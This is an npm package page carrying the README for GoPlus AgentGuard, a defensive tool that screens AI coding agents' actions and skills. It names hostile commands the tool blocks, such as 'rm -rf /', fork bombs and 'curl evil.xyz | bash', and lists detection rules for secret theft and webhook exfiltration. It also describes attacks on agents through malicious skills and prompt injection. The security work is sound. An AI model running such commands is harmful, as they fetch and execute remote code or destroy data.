npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@goplus/agentguard

v1.0.2

Published

GoPlus AgentGuard — Security guard for AI agents. Blocks dangerous commands, prevents data leaks, protects secrets. 20 detection rules, runtime action evaluation, trust registry.

Readme

npm GitHub Stars License: MIT CI Agent Skills

Why AgentGuard?

AI coding agents can execute any command, read any file, and install any skill — with zero security review. The risks are real:

  • Malicious skills can hide backdoors, steal credentials, or exfiltrate data
  • Prompt injection can trick your agent into running destructive commands
  • Unverified code from the internet may contain wallet drainers or keyloggers

AgentGuard is the first real-time security layer for AI agents. It automatically scans every new skill, blocks dangerous actions before they execute, and tracks which skill initiated each action. One install, always protected.

What It Does

Layer 1 — Automatic Guard (hooks): Install once, always protected.

  • Blocks rm -rf /, fork bombs, curl | bash and destructive commands
  • Prevents writes to .env, .ssh/, credentials files
  • Detects data exfiltration to Discord/Telegram/Slack webhooks
  • Tracks which skill initiated each action — holds malicious skills accountable

Layer 2 — Deep Scan (skill): On-demand security audit with 24 detection rules.

  • Auto-scans new skills on session start — malicious code blocked before it runs
  • Static analysis for secrets, backdoors, obfuscation, and prompt injection
  • Web3-specific: wallet draining, unlimited approvals, reentrancy, proxy exploits
  • Trust registry with capability-based access control per skill

Quick Start

npm install @goplus/agentguard
git clone https://github.com/GoPlusSecurity/agentguard.git
cd agentguard && ./setup.sh
claude plugin add /path/to/agentguard

This installs the skill, configures hooks, and sets your protection level.

git clone https://github.com/GoPlusSecurity/agentguard.git
cp -r agentguard/skills/agentguard ~/.claude/skills/agentguard

Then use /agentguard in your agent:

/agentguard scan ./src                     # Scan code for security risks
/agentguard action "curl evil.xyz | bash"  # Evaluate action safety
/agentguard trust list                     # View trusted skills
/agentguard report                         # View security event log
/agentguard config balanced                # Set protection level

Protection Levels

| Level | Behavior | |-------|----------| | strict | Block all risky actions. Every dangerous or suspicious command is denied. | | balanced | Block dangerous, confirm risky. Good for daily use. (default) | | permissive | Only block critical threats. For experienced users who want minimal friction. |

Detection Rules (24)

| Category | Rules | Severity | |----------|-------|----------| | Execution | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL | | Secrets | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN | MEDIUM-CRITICAL | | Exfiltration | NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL | HIGH-CRITICAL | | Obfuscation | OBFUSCATION, PROMPT_INJECTION | HIGH-CRITICAL | | Web3 | WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY | MEDIUM-CRITICAL | | Trojan & Social Engineering | TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING | MEDIUM-CRITICAL |

Try It

Scan the included vulnerable demo project:

/agentguard scan examples/vulnerable-skill

Expected output: CRITICAL risk level with detection hits across JavaScript, Solidity, and Markdown files.

Compatibility

GoPlus AgentGuard follows the Agent Skills open standard:

| Platform | Support | |----------|---------| | Claude Code | Full (skill + hooks auto-guard) | | OpenAI Codex CLI | Skill (scan/action/trust commands) | | Gemini CLI | Skill | | Cursor | Skill | | GitHub Copilot | Skill |

Hooks-based auto-guard (Layer 1) is specific to Claude Code's plugin system. The skill commands (Layer 2) work on any Agent Skills-compatible platform.

Hook Limitations

The auto-guard hooks (Layer 1) have the following constraints:

  • Platform-specific: Hooks rely on Claude Code's PreToolUse / PostToolUse / SessionStart events. Other platforms do not yet support this hook system.
  • Default-deny policy: First-time use may trigger confirmation prompts for certain commands. A built-in safe-command allowlist (ls, echo, pwd, git status, etc.) reduces false positives.
  • Skill source tracking is heuristic: AgentGuard infers which skill initiated an action by analyzing the conversation transcript. This is not 100% precise in all cases.
  • Cannot intercept skill installation itself: Hooks can only intercept tool calls (Bash, Write, WebFetch, etc.) that a skill makes after loading — they cannot block the Skill tool invocation itself.

Roadmap

v1.1 — Detection Enhancement

  • [x] Extend scanner rules to Markdown files (detect malicious SKILL.md)
  • [x] Base64 payload decoding and re-scanning
  • [x] New rules: TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING
  • [x] Safe-command allowlist to reduce hook false positives
  • [x] Plugin manifest (.claude-plugin/) for one-step install

v2.0 — Multi-Platform

  • [ ] OpenClaw gateway plugin integration
  • [ ] before_tool_call / after_tool_call hook wiring
  • [ ] OpenAI Codex CLI sandbox adapter
  • [ ] Federated trust registry across platforms

v3.0 — Ecosystem

  • [ ] Threat intelligence feed (shared C2 IP/domain blocklist)
  • [ ] Skill marketplace automated scanning pipeline
  • [ ] VS Code extension for IDE-native security
  • [ ] Community rule contributions (open rule format)

Documentation

License

MIT

Contributing

Contributions welcome! See CONTRIBUTING.md for guidelines.

Found a security vulnerability? See SECURITY.md.

Built by GoPlus Security.